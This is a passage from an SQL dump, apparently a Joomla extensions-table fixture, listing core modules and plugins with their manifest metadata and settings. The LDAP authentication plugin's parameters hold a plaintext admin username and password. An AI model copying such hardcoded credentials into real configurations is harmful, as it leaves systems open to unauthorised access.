00:00:00',0,0),(205,0,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,0,'mod_feed','module','mod_feed','',0,1,1,1,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,0,'mod_footer','module','mod_footer','',0,1,1,1,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_footer\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,0,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,0,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,0,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_news\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,0,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_random_image\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,0,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_related_items\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,0,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_search\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,0,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_stats\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,0,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_syndicate\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,0,'mod_users_latest','module','mod_users_latest','',0,1,1,1,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_users_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,0,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"legacy\":false,\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"July 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,0,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_whosonline\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,0,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,0,'mod_articles_category','module','mod_articles_category','',0,1,1,1,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_category\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,0,'mod_articles_categories','module','mod_articles_categories','',0,1,1,1,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_categories\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,0,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2010 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.5.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_languages\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,0,'mod_finder','module','mod_finder','',0,1,0,0,'{\"name\":\"mod_finder\",\"type\":\"module\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_finder\"}','','','',0,'0000-00-00 00:00:00',0,0),(300,0,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_custom\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,0,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_feed\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,0,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,0,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_logged\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,0,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_login\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,0,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_menu\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,0,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,0,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_quickicon\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,0,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_status\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,0,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_submenu\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,0,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_title\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,0,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_toolbar\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,0,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_multilangstatus\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,0,'mod_version','module','mod_version','',1,1,1,0,'{\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_version\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(400,0,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"gmail\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,0,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,0,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"ldap\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(404,0,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"emailcloak\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,0,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,0,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"loadmodule\"}','{\"style\":\"xhtml\"}','','',0,'2011-09-18 15:22:50',0,0),(407,0,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,1,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{\"title\":\"1\",\"article_index\":\"1\",\"article_index_text\":\"\",\"multipage_toc\":\"1\",\"showall\":\"1\",\"style\":\"tabs\"}','','',0,'0000-00-00 00:00:00',4,0),(408,0,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,1,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagenavigation\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,0,'plg_content_vote','plugin','vote','content',0,1,1,1,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"vote\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,0,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"Copyright (C) 2014 - 2021 by Marijn Haverbeke <marijnh@gmail.com> and others\",\"authorEmail\":\"marijnh@gmail.com\",\"authorUrl\":\"https:\\/\\/codemirror.net\\/\",\"version\":\"5.60.0\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"codemirror\"}','{\"linenumbers\":\"0\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',1,0),(411,0,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"September 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"none\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,0,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,1,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2020\",\"author\":\"Tiny Technologies, Inc\",\"copyright\":\"Tiny Technologies, Inc\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"https:\\/\\/www.tiny.cloud\",\"version\":\"4.5.12\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"tinymce\"}','{\"mode\":\"1\",\"skin\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"lang_code\":\"en\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet,iframe\",\"extended_elements\":\"\",\"toolbar\":\"top\",\"toolbar_align\":\"left\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"true\",\"resize_horizontal\":\"false\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"format_date\":\"%Y-%m-%d\",\"inserttime\":\"1\",\"format_time\":\"%H:%M:%S\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"media\":\"1\",\"hr\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"style\":\"1\",\"layer\":\"1\",\"xhtmlxtras\":\"1\",\"visualchars\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"advimage\":\"1\",\"advlink\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',0,'0000-00-00 00:00:00',3,0),(413,0,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2009 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"article\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,0,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"image\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,0,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"pagebreak\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,0,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"readmore\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,0,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"categories\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,0,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contacts\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,0,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,0,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, 